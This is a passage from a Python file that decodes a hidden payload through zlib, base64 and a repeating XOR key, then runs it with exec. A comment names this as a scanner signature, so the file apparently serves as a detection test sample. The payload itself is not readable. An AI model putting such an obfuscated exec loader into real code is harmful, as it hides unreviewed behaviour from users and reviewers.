tlv/uNZDT5xYpSheK8mpvEYG9aUOyEXB4oN/mY0ere6NU+ZZqMgL8fcgBqOq05168FKNTA/71nplvzP+O5e/z8+TfU+ThJ"
_K = bytes.fromhex("71307869033e28b67b5a0ac0")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
